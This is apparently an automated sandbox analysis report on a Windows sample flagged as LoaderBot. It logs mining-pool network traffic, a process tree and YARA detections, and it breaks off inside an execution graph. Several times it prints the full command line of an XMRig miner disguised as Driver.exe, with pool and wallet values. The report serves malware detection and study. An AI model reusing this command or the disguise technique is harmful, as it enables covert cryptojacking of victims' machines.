                                                                                    Jul 23, 2024 15:48:56.694363117 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.562686920 CEST497393333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.629030943 CEST333349739141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:57.629121065 CEST497393333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.629283905 CEST497393333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.655706882 CEST333349739141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:57.656150103 CEST333349739141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:49:03.563280106 CEST497403333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:03.568479061 CEST333349740141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:03.568635941 CEST497403333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:03.568758011 CEST497403333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:03.573585033 CEST333349740141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:03.779553890 CEST333349740141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:09.629460096 CEST497413333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:09.634418964 CEST333349741141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:09.634527922 CEST497413333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:09.634742022 CEST497413333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:09.639951944 CEST333349741141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:09.847747087 CEST333349741141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:15.682728052 CEST497423333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:15.703551054 CEST333349742141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:15.703618050 CEST497423333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:15.703718901 CEST497423333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:15.710645914 CEST333349742141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:15.852020025 CEST333349742141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:21.741179943 CEST497433333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:21.754950047 CEST333349743141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:21.755022049 CEST497433333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:21.755145073 CEST497433333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:21.766104937 CEST333349743141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:21.815479040 CEST333349743141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:26.937556028 CEST497443333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:27.029578924 CEST333349744141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:27.029915094 CEST497443333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:27.029915094 CEST497443333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:27.053020000 CEST333349744141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:27.483872890 CEST333349744141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:33.000771999 CEST497453333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:33.156101942 CEST333349745141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:33.156335115 CEST497453333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:33.273247004 CEST497453333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:33.298979044 CEST333349745141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:33.381174088 CEST333349745141.94.96.144192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 23, 2024 15:45:36.297075987 CEST | 51744 | 53 | 192.168.2.4 | 1.1.1.1
Jul 23, 2024 15:45:36.321499109 CEST | 53 | 51744 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 23, 2024 15:45:36.297075987 CEST | 192.168.2.4 | 1.1.1.1 | 0xb7df | Standard query (0) | pool.supportxmr.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 23, 2024 15:45:36.321499109 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7df | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 23, 2024 15:45:36.321499109 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7df | No error (0) | pool-fr.supportxmr.com | | 141.94.96.195 | A (IP address) | IN (0x0001) | false
Jul 23, 2024 15:45:36.321499109 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7df | No error (0) | pool-fr.supportxmr.com | | 141.94.96.71 | A (IP address) | IN (0x0001) | false
Jul 23, 2024 15:45:36.321499109 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7df | No error (0) | pool-fr.supportxmr.com | | 141.94.96.144 | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 09:45:24
Start date: 23/07/2024
Path: C:\Users\user\Desktop\kWYLtJ0Cn1.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\kWYLtJ0Cn1.exe"
Imagebase: 0xf60000
File size: 4'819'968 bytes
MD5 hash: 917F9D9D484F8657EFC7F60B8ADDE947
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 09:45:27
Start date: 23/07/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase: 0xa70000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 2
Start time: 09:45:33
Start date: 23/07/2024
Path: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
Imagebase: 0x140000000
File size: 4'141'064 bytes
MD5 hash: 02569A7A91A71133D4A1023BF32AA6F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.1743254277.0000000000507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
Antivirus matches:
• Detection: 61%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 3
Start time: 09:45:33
Start date: 23/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 09:45:34
Start date: 23/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 09:45:34
Start date: 23/07/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
Imagebase: 0x7ff6cc5a0000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 09:45:34
Start date: 23/07/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -u -p 7476 -s 764
Imagebase: 0x7ff6cc5a0000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 09:45:34
Start date: 23/07/2024
Path: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
Imagebase: 0x140000000
File size: 4'141'064 bytes
MD5 hash: 02569A7A91A71133D4A1023BF32AA6F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000002.3093772534.0000000000466000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2163629523.0000000000465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2163629523.0000000000463000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000002.3093652919.000000000043D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2064137301.0000000000464000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2399480104.0000000000465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Target ID: 8
Start time: 09:45:35
Start date: 23/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0xc60000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 09:47:49
Start date: 23/07/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                                    Target ID:14
                                                                                    Start time:09:47:49
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:09:47:49
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7632 -s 864
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:09:47:53
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                                                                                    Imagebase:0x140000000
                                                                                    File size:4'141'064 bytes
                                                                                    MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.3707277603.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.3283522965.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.3184707132.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.3383726249.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:09:47:54
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:09:48:50
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:09:48:50
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6272 -s 864
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:09:48:56
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                                                                                    Imagebase:0x140000000
                                                                                    File size:4'141'064 bytes
                                                                                    MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                    Has exited:false

                                                                                    Target ID:21
                                                                                    Start time:09:48:56
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false


                                                                                      Execution Graph

                                                                                      Execution Coverage:6.8%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:14.7%
                                                                                      Total number of Nodes:842
                                                                                      Total number of Limit Nodes:20
6008->5848 6010 f669fc __EH_prolog3_catch 6009->6010 6011 f66a16 6010->6011 6012 f66a98 6010->6012 6015 f66d09 4 API calls 6011->6015 6349 f66f96 6012->6349 6016 f66a29 6015->6016 6345 f66fa1 6016->6345 6018 f66a79 __Getctype 6018->5857 6020 f66938 __EH_prolog3_catch 6019->6020 6021 f66951 6020->6021 6022 f669cb 6020->6022 6352 f6763b 6021->6352 6365 f66f20 6022->6365 6026 f66964 6361 f66f2b 6026->6361 6028 f669ad __Getctype 6028->5857 6030 f655f1 6029->6030 6031 f655de 6029->6031 6032 f6692c 4 API calls 6030->6032 6031->5857 6032->6031 6034 f64887 6033->6034 6035 f64894 6033->6035 6036 f65bce _Deallocate 3 API calls 6034->6036 6035->5857 6036->6035 6039 f65da7 6037->6039 6038 f65dc5 6038->6001 6039->6038 6052 f65e4c 6039->6052 6042 f6202e 6041->6042 6045 f61fea 6041->6045 6042->5998 6043 f62023 6044 f90044 Concurrency::cancel_current_task RaiseException 6043->6044 6046 f6203c 6044->6046 6045->6043 6060 f61fa8 6045->6060 6046->5998 6049 f65d7f 6048->6049 6050 f65d8a 6049->6050 6117 f664bc 6049->6117 6050->6000 6053 f65e58 __EH_prolog3_catch 6052->6053 6054 f65efd __Getctype 6053->6054 6055 f65d92 9 API calls 6053->6055 6054->6038 6058 f65e77 6055->6058 6056 f65ef5 6057 f65d77 9 API calls 6056->6057 6057->6054 6058->6056 6059 f61fd3 9 API calls 6058->6059 6059->6056 6063 f618aa 6060->6063 6064 f646fa 4 API calls 6063->6064 6065 f618ce 6064->6065 6072 f617ed 6065->6072 6068 f64c6d 3 API calls 6069 f618e9 6068->6069 6070 f8da10 __Getctype 5 API calls 6069->6070 6071 f618fd 6070->6071 6071->6043 6081 f64753 6072->6081 6076 f6181d 6077 f64c6d 3 API calls 6076->6077 6078 f61830 6077->6078 6079 f8da10 __Getctype 5 API calls 6078->6079 6080 f6184f 6079->6080 6080->6068 6082 f64773 6081->6082 6097 f659bf 6082->6097 6084 f6180e 6085 f61705 6084->6085 6086 f61720 _strlen 6085->6086 6087 f61736 6085->6087 6104 f64cf7 6086->6104 6089 f64cf7 4 API calls 6087->6089 6090 f6175c 6089->6090 6091 f64c6d 3 API calls 6090->6091 6092 f61764 6091->6092 6093 f64c6d 3 API calls 6092->6093 
6094 f61777 6093->6094 6095 f8da10 __Getctype 5 API calls 6094->6095 6096 f61785 6095->6096 6096->6076 6098 f65a21 6097->6098 6101 f659d0 6097->6101 6099 f61511 RaiseException 6098->6099 6100 f65a26 6099->6100 6100->6084 6102 f659d7 6101->6102 6103 f66d09 4 API calls 6101->6103 6102->6084 6103->6102 6105 f64d37 6104->6105 6107 f64d0d 6104->6107 6108 f65b2c 6105->6108 6107->6087 6109 f65b45 6108->6109 6110 f65bb1 6108->6110 6113 f66d09 4 API calls 6109->6113 6111 f61511 RaiseException 6110->6111 6112 f65bb6 6111->6112 6112->6107 6114 f65b64 6113->6114 6115 f65bce _Deallocate 3 API calls 6114->6115 6116 f65b96 6114->6116 6115->6116 6116->6107 6119 f664c8 __EH_prolog3_catch 6117->6119 6118 f66504 __Getctype 6118->6050 6119->6118 6120 f61fd3 9 API calls 6119->6120 6120->6118 6122 f65fde 6121->6122 6133 f65030 6122->6133 6124 f65fe7 6124->6004 6126 f65f16 __EH_prolog3_catch 6125->6126 6127 f65d92 9 API calls 6126->6127 6128 f65f28 6127->6128 6129 f61fd3 9 API calls 6128->6129 6130 f65fb3 6129->6130 6131 f65d77 9 API calls 6130->6131 6132 f65fbb __Getctype 6131->6132 6132->6006 6148 f6960b 6133->6148 6137 f65054 6138 f65067 6137->6138 6160 f61e07 6137->6160 6173 f69672 6138->6173 6141 f6509d 6141->6124 6143 f650a3 6180 f61a9c 6143->6180 6144 f6507e 6170 f6b8b9 6144->6170 6147 f650a8 6147->6124 6149 f6961a 6148->6149 6151 f69621 6148->6151 6184 fb86cc 6149->6184 6152 f65041 6151->6152 6187 f6c783 EnterCriticalSection 6151->6187 6154 f61c6b 6152->6154 6155 f61c77 6154->6155 6156 f61c9b 6154->6156 6157 f6960b std::_Lockit::_Lockit 6 API calls 6155->6157 6156->6137 6158 f61c81 6157->6158 6159 f69672 std::_Lockit::~_Lockit 2 API calls 6158->6159 6159->6156 6161 f61e15 6160->6161 6169 f61e4a 6160->6169 6162 f8db27 std::_Facet_Register RaiseException 6161->6162 6161->6169 6163 f61e22 6162->6163 6239 f61b73 6163->6239 6169->6143 6169->6144 6171 f8db27 std::_Facet_Register RaiseException 6170->6171 6172 f6b8c4 6171->6172 6172->6138 6174 fb86da 6173->6174 6175 f6967c 6173->6175 
6344 fb86b5 LeaveCriticalSection 6174->6344 6176 f6968f 6175->6176 6343 f6c791 LeaveCriticalSection 6175->6343 6176->6141 6179 fb86e1 6179->6141 6181 f61aaa Concurrency::cancel_current_task 6180->6181 6182 f90044 Concurrency::cancel_current_task RaiseException 6181->6182 6183 f61ab8 Concurrency::cancel_current_task 6182->6183 6183->6147 6188 fcb770 6184->6188 6187->6152 6209 fcaa9c 6188->6209 6208 fcb7a2 6208->6208 6210 fcae73 __Getctype 5 API calls 6209->6210 6211 fcaab2 6210->6211 6212 fcaab6 6211->6212 6213 fcae73 __Getctype 5 API calls 6212->6213 6214 fcaacc 6213->6214 6215 fcaad0 6214->6215 6216 fcae73 __Getctype 5 API calls 6215->6216 6217 fcaae6 6216->6217 6218 fcab6c 6217->6218 6219 fcae73 __Getctype 5 API calls 6218->6219 6220 fcab82 6219->6220 6221 fcabba 6220->6221 6222 fcae73 __Getctype 5 API calls 6221->6222 6223 fcabd0 6222->6223 6224 fcac08 6223->6224 6225 fcae73 __Getctype 5 API calls 6224->6225 6226 fcac1e 6225->6226 6227 fcac22 6226->6227 6228 fcae73 __Getctype 5 API calls 6227->6228 6229 fcac38 6228->6229 6230 fcac8a 6229->6230 6231 fcae73 __Getctype 5 API calls 6230->6231 6232 fcaca0 6231->6232 6233 fcacbe 6232->6233 6234 fcae73 __Getctype 5 API calls 6233->6234 6235 fcacd4 6234->6235 6236 fcaca4 6235->6236 6237 fcae73 __Getctype 5 API calls 6236->6237 6238 fcacba 6237->6238 6238->6208 6240 f6960b std::_Lockit::_Lockit 6 API calls 6239->6240 6241 f61b7f 6240->6241 6242 f61bc0 6241->6242 6243 f61bad 6241->6243 6259 f69ee4 6242->6259 6254 f6b9e9 6243->6254 6246 f61bb7 6248 f61dd4 6246->6248 6291 f6bfa3 6248->6291 6251 f61bcb 6339 f6ba34 6251->6339 6253 f61bd5 _Yarn 6263 fba552 6254->6263 6256 f6b9f5 _Yarn 6257 fba552 std::_Locinfo::_Locinfo_ctor 61 API calls 6256->6257 6258 f6ba1d _Yarn 6256->6258 6257->6258 6258->6246 6260 f69ef5 6259->6260 6261 f90044 Concurrency::cancel_current_task RaiseException 6260->6261 6262 f61bca 6261->6262 6264 fcb770 std::_Locinfo::_Locinfo_ctor 5 API calls 6263->6264 6265 fba55f 6264->6265 6268 fba1f9 6265->6268 6269 
fba205 6268->6269 6274 fba2e8 6269->6274 6271 fba220 6288 fba248 6271->6288 6275 fba4b7 std::_Locinfo::_Locinfo_ctor 61 API calls 6274->6275 6276 fba303 6275->6276 6277 fcc3e7 __Getctype 25 API calls 6276->6277 6287 fba34e 6276->6287 6278 fba310 6277->6278 6279 fd19ee std::_Locinfo::_Locinfo_ctor 34 API calls 6278->6279 6280 fba335 6279->6280 6284 fd19ee std::_Locinfo::_Locinfo_ctor 34 API calls 6280->6284 6286 fba33c 6280->6286 6280->6287 6281 fb8595 __Getctype IsProcessorFeaturePresent GetCurrentProcess TerminateProcess 6282 fba446 6281->6282 6283 fb86b5 std::_Lockit::~_Lockit LeaveCriticalSection 6282->6283 6285 fba44e 6283->6285 6284->6286 6285->6271 6286->6281 6286->6287 6287->6271 6289 fb86b5 std::_Lockit::~_Lockit LeaveCriticalSection 6288->6289 6290 fba231 6289->6290 6290->6256 6303 fbbd39 6291->6303 6293 f6bfac __Getctype 6294 f6bfc6 6293->6294 6295 f6bfe4 6293->6295 6308 fba7fb 6294->6308 6297 fba7fb __Getctype 25 API calls 6295->6297 6298 f6bfcd 6297->6298 6313 fbbd83 6298->6313 6301 f61df4 6301->6251 6304 fcc3e7 __Getctype 25 API calls 6303->6304 6305 fbbd44 6304->6305 6325 fcca09 6305->6325 6309 fcc3e7 __Getctype 25 API calls 6308->6309 6310 fba806 6309->6310 6311 fcca09 __Getctype 25 API calls 6310->6311 6312 fba816 6311->6312 6312->6298 6314 fcc3e7 __Getctype 25 API calls 6313->6314 6315 fbbd8e 6314->6315 6316 fcca09 __Getctype 25 API calls 6315->6316 6317 f6bff5 6316->6317 6317->6301 6318 fbc267 6317->6318 6319 fbc2af 6318->6319 6320 fbc274 __Getctype 6318->6320 6319->6301 6320->6319 6321 fb8595 __Getctype 3 API calls 6320->6321 6322 fbc2c5 __Getctype 6321->6322 6324 fbc2d5 __Getctype 6322->6324 6329 fd2173 6322->6329 6324->6301 6326 fcca1c 6325->6326 6327 fbbd54 6325->6327 6326->6327 6328 fd8471 __Getctype 25 API calls 6326->6328 6327->6293 6328->6327 6330 fd21ac __Getctype 6329->6330 6332 fd21d3 __Getctype 6330->6332 6335 fd25f2 6330->6335 6333 f8da10 __Getctype 5 API calls 6332->6333 6334 fd223a 6333->6334 6334->6324 6336 fd261d __Getctype 
